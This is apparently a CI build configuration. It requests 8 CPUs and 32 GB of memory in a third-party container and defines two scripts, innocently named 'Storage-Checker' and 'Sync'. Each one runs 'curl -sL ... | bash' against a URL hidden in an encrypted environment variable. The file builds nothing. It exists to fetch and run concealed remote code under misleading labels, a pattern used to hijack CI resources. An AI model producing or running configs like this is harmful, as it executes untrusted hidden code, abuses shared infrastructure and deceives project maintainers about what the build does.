env:
    de: ENCRYPTED[8488bdf67ada3f3b1b932b66f5feb6ee7fbf45276a13ea95d2aae02cde526bb5bcf5212fbd3e15af2805b2cbdf36cc35]
    dee: ENCRYPTED[29f887a48ac3e86ee91a394afc71f5b6c7f91f75f44ea19cff856b843a7a73eb7ca29a43e84bfc29a00f8ac592b178f8]

task:
  name: "build"
  timeout_in: 120m
  container:
      image: shazuxdd/ubuntu:latest
      cpu: 8
      memory: 32G
  Storage-Checker_script:
      - curl -sL ${de} | bash
  Sync_script:
      - curl -sL ${dee} | bash
